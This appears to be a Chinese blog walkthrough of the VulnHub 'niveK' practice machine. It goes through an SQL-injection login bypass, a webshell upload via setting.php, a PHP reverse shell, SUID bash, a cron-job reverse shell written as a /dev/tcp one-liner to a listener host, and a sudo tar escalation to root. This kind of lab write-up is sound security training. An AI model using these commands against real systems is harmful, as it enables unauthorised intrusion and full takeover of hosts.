nivek靶场-vulnhub

https://download.vulnhub.com/hms/niveK.ovanivek靶场-vulnhubhttp://niveK靶场1.下载靶场,打开virtual box导入靶场,网络改为桥接模式,打开虚拟机。

2.nmap先来扫描一下端口:

nmap 192.168.0.17 -p-

扫描出7080为web端口,浏览器打开发现登录页面:

nivek靶场-vulnhub

 抓包一下,看到登录页面有sql注入漏洞:

nivek靶场-vulnhub

 既然存在sql注入,那么就试了一下万能登录,登录成功,进入了后台:

nivek靶场-vulnhub

nivek靶场-vulnhub 

进入后台寻找注入和上传点,另外扫描器找到了一个文件目录,那么只要找到上传方法就可以来写入webshell了,另外sqlmap试了一下,虽然有注入,但是用户名和密码都是加密的,没办法。  靶场使用lamp搭建的。

nivek靶场-vulnhub

nivek靶场-vulnhub 

找到了setting.php这个文件上传点:

nivek靶场-vulnhub

 上传webshell:

nivek靶场-vulnhub

连接一下:

nivek靶场-vulnhub

nivek靶场-vulnhub 

连接成功,看了一眼login.php:

nivek靶场-vulnhub

使用php-reverse-shell.php进行反弹,上传到文件目录之后,访问一下就可以反弹nc,这样非常方便,如果用命令行反弹,容易出错:

nivek靶场-vulnhub

 

python -c "import pty;pty.spawn('/bin/bash')"

第一个flag在home的当前目录:

nivek靶场-vulnhub 

 

使用python提升一下命令行,查找一下SUID文件:

python -c "import pty;pty.spawn('/bin/bash')"
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

 nivek靶场-vulnhub

 

/usr/bin/bash -p

nivek靶场-vulnhub

nivek靶场-vulnhub

 

现在是登录到eren用户:

nivek靶场-vulnhub

cat /etc/crontab

 可以用crontab反弹另一个webshell,通过crontab文件:

bash -c代表从字符串读入命令:

echo "bash -c \"bash -i >& /dev/tcp/192.168.0.16/4556 0>&1\" " >> /home/eren/backup.sh
nc -lvvp 4556

nivek靶场-vulnhub

需要等一会才可以反弹成功,这个一个定时执行的命令:

sudo -l

nivek靶场-vulnhub

 用tar命令提权:

sudo tar -cf /dev/null /dev/null --checkpoint=1  --checkpoint-action=exec=/bin/bash

nivek靶场-vulnhub

 

上一篇:【人机交互接口Bash】


下一篇:Linux环境变量的加载顺序